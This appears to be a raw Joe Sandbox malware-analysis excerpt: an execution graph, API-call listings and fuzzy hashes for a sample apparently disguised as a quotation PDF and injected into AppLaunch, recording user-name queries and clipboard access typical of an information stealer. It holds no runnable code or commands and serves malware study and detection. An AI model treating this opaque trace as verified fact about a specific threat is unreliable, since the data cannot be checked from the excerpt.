                                                    • Snapshot File: hcaresult_0_2_5c00000_QUOTATION_SEPT9FIBA00541#U00b7PDF.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (_0q$(_0q$(_0q$(_0q
                                                    • API String ID: 0-1939656205
                                                    • Opcode ID: a03dcbb4851f7741d7c04b8f9c21dc3004eae412c58accaac598182ce9b3ffd7
                                                    • Instruction ID: 4c229d079b1248f3310038d21c18643df378600c5736c24a00a9a475f104d196
                                                    • Opcode Fuzzy Hash: a03dcbb4851f7741d7c04b8f9c21dc3004eae412c58accaac598182ce9b3ffd7
                                                    • Instruction Fuzzy Hash: 0D61F274B042408FCB05EB78C4645AD7FB2EF86308F1598AAE5469B3A2DB35DD45CB90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Execution Graph

                                                    Execution Coverage:12.3%
                                                    Dynamic/Decrypted Code Coverage:100%
                                                    Signature Coverage:0.7%
                                                    Total number of Nodes:426
                                                    Total number of Limit Nodes:48
                                                    execution_graph 22499 a59b058 22500 a59b0c0 CreateWindowExW 22499->22500 22502 a59b17c 22500->22502 22502->22502 22503 fc8cd8 22504 fc8cf0 22503->22504 22507 fc1458 22504->22507 22509 fc1478 22507->22509 22508 fc16f6 22509->22508 22518 fc1a41 22509->22518 22526 a5983b8 22509->22526 22530 a5983a8 22509->22530 22534 fc7308 22509->22534 22548 fc7458 22509->22548 22562 fc7318 22509->22562 22576 fc830c 22509->22576 22581 fc182c 22509->22581 22521 fc1a57 22518->22521 22519 fc1b66 22519->22509 22520 fc1458 3 API calls 22520->22521 22521->22519 22521->22520 22593 fc6fe0 22521->22593 22598 fc6fd0 22521->22598 22603 fc1b80 22521->22603 22617 fc1b71 22521->22617 22527 a5983ca 22526->22527 22529 a598445 22527->22529 22647 a59803c 22527->22647 22529->22509 22531 a5983ca 22530->22531 22532 a59803c GetModuleHandleW 22531->22532 22533 a598445 22531->22533 22532->22533 22533->22509 22535 fc7318 22534->22535 22536 fc7374 22535->22536 22539 fc738e 22535->22539 22698 fc67b4 GetUserNameW 22536->22698 22540 fc1458 3 API calls 22539->22540 22546 fc741d 22539->22546 22541 fc73e6 22540->22541 22542 fc1458 3 API calls 22541->22542 22543 fc73f9 22542->22543 22547 fc7458 3 API calls 22543->22547 22544 fc740c 22545 fc1458 3 API calls 22544->22545 22545->22546 22546->22509 22547->22544 22549 fc73eb 22548->22549 22550 fc73ed 22549->22550 22556 fc7466 22549->22556 22551 fc1458 3 API calls 22550->22551 22552 fc73f9 22551->22552 22561 fc7458 3 API calls 22552->22561 22553 fc740c 22554 fc1458 3 API calls 22553->22554 22555 fc741d 22554->22555 22555->22509 22557 fc1458 3 API calls 22556->22557 22558 fc7503 22557->22558 22559 fc1458 3 API calls 22558->22559 22560 fc7567 22559->22560 22561->22553 22563 fc7330 22562->22563 22564 fc7374 22563->22564 22567 fc738e 22563->22567 22699 fc67b4 GetUserNameW 22564->22699 22568 fc1458 3 API calls 22567->22568 22574 fc741d 22567->22574 22569 fc73e6 22568->22569 22570 fc1458 3 API calls 22569->22570 22571 fc73f9 22570->22571 22575 fc7458 3 API calls 22571->22575 22572 fc740c 22573 fc1458 3 API calls 22572->22573 22573->22574 22574->22509 22575->22572 22577 fc832e 22576->22577 22578 fc83df 22577->22578 22700 fc88b8 22577->22700 22707 fc88a8 22577->22707 22578->22509 22583 fc171e 22581->22583 22584 fc1833 22581->22584 22582 fc1820 22582->22509 22583->22582 22585 fc182c 3 API calls 22583->22585 22586 a5983b8 GetModuleHandleW 22583->22586 22587 a5983a8 GetModuleHandleW 22583->22587 22588 fc7318 3 API calls 22583->22588 22589 fc7308 3 API calls 22583->22589 22590 fc7458 3 API calls 22583->22590 22591 fc1a41 3 API calls 22583->22591 22592 fc830c 3 API calls 22583->22592 22584->22509 22585->22583 22586->22583 22587->22583 22588->22583 22589->22583 22590->22583 22591->22583 22592->22583 22594 fc6ff8 22593->22594 22595 fc7057 22594->22595 22631 fc679c 22594->22631 22599 fc6fe0 22598->22599 22600 fc7057 22599->22600 22601 fc679c GetUserNameW 22599->22601 22602 fc7049 22601->22602 22602->22521 22604 fc1b99 22603->22604 22635 fc1c41 22604->22635 22605 fc1bb5 22615 fc5360 GetUserNameW GetUserNameW GetModuleHandleW 22605->22615 22606 fc1bbd 22616 fc5488 GetUserNameW GetUserNameW GetModuleHandleW 22606->22616 22607 fc1bc5 22608 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22607->22608 22609 fc1be5 22608->22609 22610 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22609->22610 22613 fc1c11 22609->22613 22611 fc1c05 22610->22611 22612 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22611->22612 22612->22613 22613->22521 22615->22606 22616->22607 22618 fc1b80 22617->22618 22629 fc1c41 3 API calls 22618->22629 22619 fc1bb5 22641 fc5360 22619->22641 22620 fc1bbd 22628 fc5488 GetUserNameW GetUserNameW GetModuleHandleW 22620->22628 22621 fc1bc5 22622 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22621->22622 22623 fc1be5 22622->22623 22624 fc1c11 22623->22624 22625 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22623->22625 22624->22521 22626 fc1c05 22625->22626 22627 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22626->22627 22627->22624 22628->22621 22629->22619 22632 fc7118 GetUserNameW 22631->22632 22634 fc7265 22632->22634 22636 fc1c66 22635->22636 22637 fc1458 3 API calls 22636->22637 22640 fc1c8a 22637->22640 22638 fc1d1a 22639 fc1458 3 API calls 22639->22640 22640->22638 22640->22639 22642 fc5386 22641->22642 22643 fc1458 3 API calls 22642->22643 22644 fc53b3 22643->22644 22645 fc5434 22644->22645 22646 fc1458 3 API calls 22644->22646 22646->22644 22648 a598047 22647->22648 22652 a59956b 22648->22652 22662 a599580 22648->22662 22649 a598622 22649->22529 22653 a5995ab 22652->22653 22672 a59838c 22653->22672 22656 a59962e 22658 a59965a 22656->22658 22685 a599014 22656->22685 22659 a59838c GetModuleHandleW 22659->22656 22663 a5995ab 22662->22663 22664 a59838c GetModuleHandleW 22663->22664 22665 a599612 22664->22665 22669 a59838c GetModuleHandleW 22665->22669 22670 a599a51 GetModuleHandleW 22665->22670 22671 a599ad0 GetModuleHandleW 22665->22671 22666 a59962e 22667 a599014 GetModuleHandleW 22666->22667 22668 a59965a 22666->22668 22667->22668 22669->22666 22670->22666 22671->22666 22673 a598397 22672->22673 22674 a599612 22673->22674 22689 a599c95 22673->22689 22674->22659 22676 a599ad0 22674->22676 22680 a599a51 22674->22680 22677 a599b2d 22676->22677 22678 a599bae 22677->22678 22679 a599c95 GetModuleHandleW 22677->22679 22679->22678 22681 a599a6b 22680->22681 22682 a599a6f 22680->22682 22681->22656 22683 a599bae 22682->22683 22684 a599c95 GetModuleHandleW 22682->22684 22684->22683 22687 a599fb0 GetModuleHandleW 22685->22687 22688 a59a025 22687->22688 22688->22658 22690 a599014 GetModuleHandleW 22689->22690 22691 a599ca9 22690->22691 22692 a599014 GetModuleHandleW 22691->22692 22697 a599e74 22691->22697 22693 a599dfa 22692->22693 22694 a599014 GetModuleHandleW 22693->22694 22693->22697 22695 a599e48 22694->22695 22696 a599014 GetModuleHandleW 22695->22696 22695->22697 22696->22697 22697->22674 22701 fc88c1 22700->22701 22702 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22701->22702 22703 fc8cbd 22701->22703 22714 fc8d69 22701->22714 22718 fca613 22701->22718 22723 fca560 22701->22723 22702->22701 22703->22577 22709 fc88b8 22707->22709 22708 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22708->22709 22709->22708 22710 fc8cbd 22709->22710 22711 fc8d69 3 API calls 22709->22711 22712 fca560 3 API calls 22709->22712 22713 fca613 3 API calls 22709->22713 22710->22577 22711->22709 22712->22709 22713->22709 22715 fc8d95 22714->22715 22716 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22715->22716 22717 fca484 22715->22717 22716->22715 22717->22701 22720 fca5e8 22718->22720 22719 fca629 22720->22719 22728 fca65f 22720->22728 22735 fca670 22720->22735 22725 fca58d 22723->22725 22724 fca629 22725->22724 22726 fca65f 3 API calls 22725->22726 22727 fca670 3 API calls 22725->22727 22726->22725 22727->22725 22731 fca68a 22728->22731 22729 fca753 22730 fc1458 3 API calls 22730->22731 22731->22729 22731->22730 22742 fcaad1 22731->22742 22764 fca8a8 22731->22764 22786 fca77d 22731->22786 22736 fca68a 22735->22736 22737 fc1458 3 API calls 22736->22737 22738 fca753 22736->22738 22739 fca77d 3 API calls 22736->22739 22740 fca8a8 3 API calls 22736->22740 22741 fcaad1 3 API calls 22736->22741 22737->22736 22738->22738 22739->22736 22740->22736 22741->22736 22744 fca7b1 22742->22744 22743 fcab00 22743->22731 22744->22743 22747 fcab0d 22744->22747 22748 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22744->22748 22756 fca77d GetUserNameW GetUserNameW GetModuleHandleW 22744->22756 22757 fca8a8 GetUserNameW GetUserNameW GetModuleHandleW 22744->22757 22758 fcab28 GetUserNameW GetUserNameW GetModuleHandleW 22744->22758 22759 fcaad1 GetUserNameW GetUserNameW GetModuleHandleW 22744->22759 22808 fce630 22744->22808 22815 fce620 22744->22815 22745 fcab49 22745->22731 22746 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22746->22747 22747->22745 22747->22746 22749 fcacee 22747->22749 22748->22744 22753 fcadbd 22749->22753 22760 fca77d 3 API calls 22749->22760 22761 fca8a8 3 API calls 22749->22761 22763 fcaad1 3 API calls 22749->22763 22821 fcab28 22749->22821 22750 fcad93 22750->22731 22751 fcad7c 22751->22750 22752 fc1458 3 API calls 22751->22752 22752->22753 22753->22731 22756->22744 22757->22744 22758->22744 22759->22744 22760->22751 22761->22751 22763->22751 22775 fca7b1 22764->22775 22765 fcab00 22765->22731 22766 fcab49 22766->22731 22767 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22768 fcab0d 22767->22768 22768->22766 22768->22767 22769 fcacee 22768->22769 22774 fcadbd 22769->22774 22778 fca77d 3 API calls 22769->22778 22779 fca8a8 3 API calls 22769->22779 22780 fcab28 3 API calls 22769->22780 22781 fcaad1 3 API calls 22769->22781 22770 fcad93 22770->22731 22771 fcad7c 22771->22770 22773 fc1458 3 API calls 22771->22773 22772 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22772->22775 22773->22774 22774->22731 22775->22765 22775->22768 22775->22772 22776 fce630 3 API calls 22775->22776 22777 fce620 3 API calls 22775->22777 22782 fca77d GetUserNameW GetUserNameW GetModuleHandleW 22775->22782 22783 fca8a8 GetUserNameW GetUserNameW GetModuleHandleW 22775->22783 22784 fcab28 GetUserNameW GetUserNameW GetModuleHandleW 22775->22784 22785 fcaad1 GetUserNameW GetUserNameW GetModuleHandleW 22775->22785 22776->22775 22777->22775 22778->22771 22779->22771 22780->22771 22781->22771 22782->22775 22783->22775 22784->22775 22785->22775 22795 fca7b1 22786->22795 22787 fcab00 22787->22731 22788 fcab49 22788->22731 22789 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22790 fcab0d 22789->22790 22790->22788 22790->22789 22791 fcacee 22790->22791 22796 fcadbd 22791->22796 22800 fca77d 3 API calls 22791->22800 22801 fca8a8 3 API calls 22791->22801 22802 fcab28 3 API calls 22791->22802 22803 fcaad1 3 API calls 22791->22803 22792 fcad93 22792->22731 22793 fcad7c 22793->22792 22794 fc1458 3 API calls 22793->22794 22794->22796 22795->22787 22795->22790 22797 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22795->22797 22798 fce630 3 API calls 22795->22798 22799 fce620 3 API calls 22795->22799 22804 fca77d GetUserNameW GetUserNameW GetModuleHandleW 22795->22804 22805 fca8a8 GetUserNameW GetUserNameW GetModuleHandleW 22795->22805 22806 fcab28 GetUserNameW GetUserNameW GetModuleHandleW 22795->22806 22807 fcaad1 GetUserNameW GetUserNameW GetModuleHandleW 22795->22807 22796->22731 22797->22795 22798->22795 22799->22795 22800->22793 22801->22793 22802->22793 22803->22793 22804->22795 22805->22795 22806->22795 22807->22795 22809 fce63f 22808->22809 22811 fce69f 22808->22811 22809->22744 22810 fce7a8 22810->22744 22811->22810 22812 fc1458 3 API calls 22811->22812 22814 fce854 22812->22814 22813 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22813->22814 22814->22810 22814->22813 22816 fce630 22815->22816 22817 fce63f 22816->22817 22818 fc1458 3 API calls 22816->22818 22817->22744 22820 fce854 22818->22820 22819 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22819->22820 22820->22817 22820->22819 22824 fcab44 22821->22824 22822 fcab49 22822->22751 22823 fcacee 22829 fcadbd 22823->22829 22830 fca77d 3 API calls 22823->22830 22831 fca8a8 3 API calls 22823->22831 22832 fcab28 3 API calls 22823->22832 22833 fcaad1 3 API calls 22823->22833 22824->22822 22824->22823 22825 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22824->22825 22825->22824 22826 fcad93 22826->22751 22827 fcad7c 22827->22826 22828 fc1458 3 API calls 22827->22828 22828->22829 22829->22751 22830->22827 22831->22827 22832->22827 22833->22827 22834 fc099b 22835 fc084e 22834->22835 22835->22834 22836 fc091b 22835->22836 22837 fc182c 3 API calls 22835->22837 22838 fc1458 3 API calls 22835->22838 22840 fc1718 22835->22840 22837->22835 22838->22835 22842 fc171e 22840->22842 22841 fc1820 22841->22835 22842->22841 22843 fc182c 3 API calls 22842->22843 22844 a5983b8 GetModuleHandleW 22842->22844 22845 a5983a8 GetModuleHandleW 22842->22845 22846 fc7318 3 API calls 22842->22846 22847 fc7308 3 API calls 22842->22847 22848 fc7458 3 API calls 22842->22848 22849 fc830c 3 API calls 22842->22849 22850 fc1a41 3 API calls 22842->22850 22843->22842 22844->22842 22845->22842 22846->22842 22847->22842 22848->22842 22849->22842 22850->22842 22851 a59ef50 DuplicateHandle 22852 a59efe6 22851->22852 22853 a59b210 22854 a59b236 22853->22854 22859 a59913c 22854->22859 22860 a599147 22859->22860 22861 a59b242 22860->22861 22871 a599174 22860->22871 22863 a59914c 22861->22863 22864 a599157 22863->22864 22865 a59fbc1 22864->22865 22867 a59fbb1 22864->22867 22868 a59fbbf 22865->22868 22889 a59ea7c 22865->22889 22877 a59fcd8 22867->22877 22883 a59fce8 22867->22883 22872 a59917f 22871->22872 22873 a59838c GetModuleHandleW 22872->22873 22874 a59b3a9 22873->22874 22875 a599014 GetModuleHandleW 22874->22875 22876 a59b417 22874->22876 22875->22876 22876->22861 22879 a59fcf6 22877->22879 22878 a59ea7c 7 API calls 22878->22879 22879->22878 22880 a59fdda 22879->22880 22896 fcec80 22879->22896 22906 fcec71 22879->22906 22880->22868 22885 a59fcf6 22883->22885 22884 a59ea7c 7 API calls 22884->22885 22885->22884 22886 a59fdda 22885->22886 22887 fcec80 6 API calls 22885->22887 22888 fcec71 6 API calls 22885->22888 22886->22868 22887->22885 22888->22885 22890 a59ea87 22889->22890 22891 a59fedc 22890->22891 22892 a59fe32 22890->22892 22893 a59914c 6 API calls 22891->22893 22894 a59fe8a CallWindowProcW 22892->22894 22895 a59fe39 22892->22895 22893->22895 22894->22895 22895->22868 22899 fcec9f 22896->22899 22897 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22897->22899 22898 fcedea 22900 fc1458 3 API calls 22898->22900 22899->22897 22899->22898 22903 fceca4 22899->22903 22916 fcee80 22899->22916 22922 fcee70 22899->22922 22901 fcee12 22900->22901 22902 fc1458 3 API calls 22901->22902 22902->22903 22903->22879 22908 fcec9f 22906->22908 22907 fcedea 22910 fc1458 3 API calls 22907->22910 22908->22907 22909 fc1458 GetUserNameW GetUserNameW GetModuleHandleW 22908->22909 22913 fceca4 22908->22913 22914 fcee80 3 API calls 22908->22914 22915 fcee70 3 API calls 22908->22915 22909->22908 22911 fcee12 22910->22911 22912 fc1458 3 API calls 22911->22912 22912->22913 22913->22879 22914->22908 22915->22908 22918 fcee88 22916->22918 22917 fcee9c 22917->22899 22918->22917 22928 fcf2c8 22918->22928 22941 fcf2ba 22918->22941 22919 fceeb1 22919->22899 22924 fcee88 22922->22924 22923 fcee9c 22923->22899 22924->22923 22926 fcf2c8 3 API calls 22924->22926 22927 fcf2ba 3 API calls 22924->22927 22925 fceeb1 22925->22899 22926->22925 22927->22925 22929 fcf2da 22928->22929 22930 fcf2f5 22929->22930 22932 fcf339 22929->22932 22936 fcf2c8 3 API calls 22930->22936 22937 fcf2ba 3 API calls 22930->22937 22931 fcf2fb 22931->22919 22954 fcf46a 22932->22954 22934 fcf3d7 22934->22919 22935 fcf3b9 22935->22919 22936->22931 22937->22931 22942 fcf2da 22941->22942 22943 fcf2f5 22942->22943 22945 fcf339 22942->22945 22950 fcf2c8 3 API calls 22943->22950 22951 fcf2ba 3 API calls 22943->22951 22944 fcf2fb 22944->22919 22949 fcf46a 2 API calls 22945->22949 22946 fcf3b5 22948 fcf3b9 22946->22948 22952 fcf590 OleGetClipboard 22946->22952 22953 fcf581 OleGetClipboard 22946->22953 22947 fcf3d7 22947->22919 22948->22919 22949->22946 22950->22944 22951->22944 22952->22947 22953->22947 22955 fcf480 22954->22955 22967 fcf49e 22955->22967 22972 fcf4a0 22955->22972 22956 fcf3b5 22956->22935 22959 fcf590 22956->22959 22963 fcf581 22956->22963 22961 fcf5a5 22959->22961 22962 fcf5cb 22961->22962 22981 fcefe4 22961->22981 22962->22934 22965 fcf5a5 22963->22965 22964 fcefe4 OleGetClipboard 22964->22965 22965->22964 22966 fcf5cb 22965->22966 22966->22934 22968 fcf4ab 22967->22968 22969 fcf4bb 22968->22969 22977 fcf4e8 OleInitialize 22968->22977 22979 fcf4f0 OleInitialize 22968->22979 22969->22956 22973 fcf4ab 22972->22973 22974 fcf4bb 22973->22974 22975 fcf4e8 OleInitialize 22973->22975 22976 fcf4f0 OleInitialize 22973->22976 22974->22956 22975->22974 22976->22974 22978 fcf554 22977->22978 22978->22969 22980 fcf554 22979->22980 22980->22969 22982 fcf638 OleGetClipboard 22981->22982 22984 fcf6d2 22982->22984 22985 a59b332 22986 a599174 GetModuleHandleW 22985->22986 22987 a59b347 22986->22987 22988 fceba0 22989 fceba8 22988->22989 22990 fcebcb 22989->22990 22993 fcebe0 22989->22993 22996 fcebd8 22989->22996 22994 fcec21 KiUserCallbackDispatcher 22993->22994 22995 fcec4e 22994->22995 22995->22989 22997 fcec21 KiUserCallbackDispatcher 22996->22997 22998 fcec4e 22997->22998 22998->22989
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 1a52d072127032d8d3c62ff8634f4db276e3476edc3fa9fd8183ef330a7c35fd
                                                    • Instruction ID: 37ddb392cff07d1929040323db872c7691aa32e2bfb39a01f4f03e51259dd17e
                                                    • Opcode Fuzzy Hash: 1a52d072127032d8d3c62ff8634f4db276e3476edc3fa9fd8183ef330a7c35fd
                                                    • Instruction Fuzzy Hash: D8511071D043198FDB14DFAAC989B9DBBB1BB48310F18851DE815AB390D774A844CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 836 a59ea7c-a59fe2c 839 a59fedc-a59fefc call a59914c 836->839 840 a59fe32-a59fe37 836->840 847 a59feff-a59ff0c 839->847 842 a59fe39-a59fe70 840->842 843 a59fe8a-a59fec2 CallWindowProcW 840->843 850 a59fe79-a59fe88 842->850 851 a59fe72-a59fe78 842->851 845 a59fecb-a59feda 843->845 846 a59fec4-a59feca 843->846 845->847 846->845 850->847 851->850
                                                    APIs
                                                    • CallWindowProcW.USER32(?,?,?,?,?), ref: 0A59FEB1
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: CallProcWindow
                                                    • String ID: DGP
                                                    • API String ID: 2714655100-445202297
                                                    • Opcode ID: 6647892eabd6e69ebfbac715226909c4ddf7ef69015b0039f866d2027dc45675
                                                    • Instruction ID: e842fe1d4d4aa7e43a9a18e246b07b9f808d19b211820304eea4399630755a94
                                                    • Opcode Fuzzy Hash: 6647892eabd6e69ebfbac715226909c4ddf7ef69015b0039f866d2027dc45675
                                                    • Instruction Fuzzy Hash: A94138B4900309DFCB54CF99C888AAABFF5FF88314F258859D519AB321C734A845CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 2012 fc710d-fc7177 2014 fc7179-fc71a4 2012->2014 2015 fc71e2-fc71e6 2012->2015 2024 fc71d4 2014->2024 2025 fc71a6-fc71a8 2014->2025 2016 fc71e8-fc720b 2015->2016 2017 fc7211-fc721c 2015->2017 2016->2017 2018 fc721e-fc7226 2017->2018 2019 fc7228-fc7263 GetUserNameW 2017->2019 2018->2019 2022 fc726c-fc7282 2019->2022 2023 fc7265-fc726b 2019->2023 2029 fc7298-fc72bf 2022->2029 2030 fc7284-fc7290 2022->2030 2023->2022 2026 fc71d9-fc71dc 2024->2026 2027 fc71ca-fc71d2 2025->2027 2028 fc71aa-fc71b4 2025->2028 2026->2015 2027->2026 2034 fc71b8-fc71c6 2028->2034 2035 fc71b6 2028->2035 2036 fc72cf 2029->2036 2037 fc72c1-fc72c5 2029->2037 2030->2029 2034->2034 2038 fc71c8 2034->2038 2035->2034 2042 fc72d0 2036->2042 2037->2036 2040 fc72c7-fc72ca call fc0a00 2037->2040 2038->2027 2040->2036 2042->2042
                                                    APIs
                                                    • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 815f7f1d57c89ae5d26821ca39b47f55c948d71e7250dd9c70c5b2005540c3a7
                                                    • Instruction ID: 21bee3d55fca56d9410a71db84c9648e63a60cd441500f34dea2c1974710fadc
                                                    • Opcode Fuzzy Hash: 815f7f1d57c89ae5d26821ca39b47f55c948d71e7250dd9c70c5b2005540c3a7
                                                    • Instruction Fuzzy Hash: 85510170D0421A8FDB14DFA9C989B9DBBB1BF48310F14852EE815AB291D7749844DF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • GetUserNameW.ADVAPI32(00000000,00000000), ref: 00FC7253
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: NameUser
                                                    • String ID:
                                                    • API String ID: 2645101109-0
                                                    • Opcode ID: 67bac4c27ce9a1eda4e1dd5dad177d8e0fdaad8d03a4d002da3c0409f025b428
                                                    • Instruction ID: 93100872710d5d3f548d8a6b85bf28305105c426f6ac0ab657899cc219afb9a6
                                                    • Opcode Fuzzy Hash: 67bac4c27ce9a1eda4e1dd5dad177d8e0fdaad8d03a4d002da3c0409f025b428
                                                    • Instruction Fuzzy Hash: 66510070D043198FDB18DFAAC989BDDBBB1BB48310F58852EE815AB391D774A844CF94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A59B16A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 86ed78bd86bfaa8c5c35c6af4eeff6db46ab762192fe5716805631fdd082d8b2
                                                    • Instruction ID: ea1c0c6fef6b4978beee7692574a110b258e9192d5f3308b8ac48d4c66103480
                                                    • Opcode Fuzzy Hash: 86ed78bd86bfaa8c5c35c6af4eeff6db46ab762192fe5716805631fdd082d8b2
                                                    • Instruction Fuzzy Hash: 8351C0B1D103099FDF14CF9AD984ADEBFB5BF48310F65812AE818AB210D771A845CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0A59B16A
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: CreateWindow
                                                    • String ID:
                                                    • API String ID: 716092398-0
                                                    • Opcode ID: 9c17461c9b5cb88d2d7d5118ad1caf4ab219b2c6516971b26672c96d160e19c2
                                                    • Instruction ID: e281bd5d80f26e0cdce5d7600d8dd128e09feebea9ad9e2b3215b70a4c4c67c4
                                                    • Opcode Fuzzy Hash: 9c17461c9b5cb88d2d7d5118ad1caf4ab219b2c6516971b26672c96d160e19c2
                                                    • Instruction Fuzzy Hash: E741BFB1D103099FDF14CF9AD984ADEBFB5BF48310F65812AE818AB210D775A845CF90
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: Clipboard
                                                    • String ID:
                                                    • API String ID: 220874293-0
                                                    • Opcode ID: d9e98f7037484b691c51dfd39b1e48a6ad5644714112db3543b436d57f31270b
                                                    • Instruction ID: cb24b845eb5b0a6bb7534b6ceeda7b1bdc4c40626162640a230f03908098418c
                                                    • Opcode Fuzzy Hash: d9e98f7037484b691c51dfd39b1e48a6ad5644714112db3543b436d57f31270b
                                                    • Instruction Fuzzy Hash: 4E3114B0D01249EFDB24CFA9DA85BDEBBF5AF48314F248069E404AB391C775984ACB51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572301979.0000000000FC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00FC0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_fc0000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: Clipboard
                                                    • String ID:
                                                    • API String ID: 220874293-0
                                                    • Opcode ID: b2588855b825d33d2c1c277c973ced873bd551c7b3dc4c32e06d31eb429a3b69
                                                    • Instruction ID: 0829fb6aabba8ca9fe9bb882b376cc9af9b49b2a08fdf12e040cafbad7e99f5f
                                                    • Opcode Fuzzy Hash: b2588855b825d33d2c1c277c973ced873bd551c7b3dc4c32e06d31eb429a3b69
                                                    • Instruction Fuzzy Hash: 67311670D01249DFDB14DF99CA85BDEFBF5AF48314F248029E404AB390D7749849CB55
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0A59EFD7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
                                                    • Opcode ID: 6955ec1fee636de557b868f6fc2b0794f755d632e4c427c3060a9e63e5a90467
                                                    • Instruction ID: 6813f38093c59e52f3334e4c4797f92f3eab9d8a9d1d23931adaebd1cfa8ff2c
                                                    • Opcode Fuzzy Hash: 6955ec1fee636de557b868f6fc2b0794f755d632e4c427c3060a9e63e5a90467
                                                    • Instruction Fuzzy Hash: 7A21E3B59012489FDF10CFAAD984AEEBFF4FB48320F14841AE854A7310C374A945CF61
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    APIs
                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0A59EFD7
                                                    Memory Dump Source
                                                    • Source File: 0000000B.00000002.572767287.000000000A590000.00000040.00000800.00020000.00000000.sdmp, Offset: 0A590000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_11_2_a590000_AppLaunch.jbxd
                                                    Similarity
                                                    • API ID: DuplicateHandle
                                                    • String ID:
                                                    • API String ID: 3793708945-0
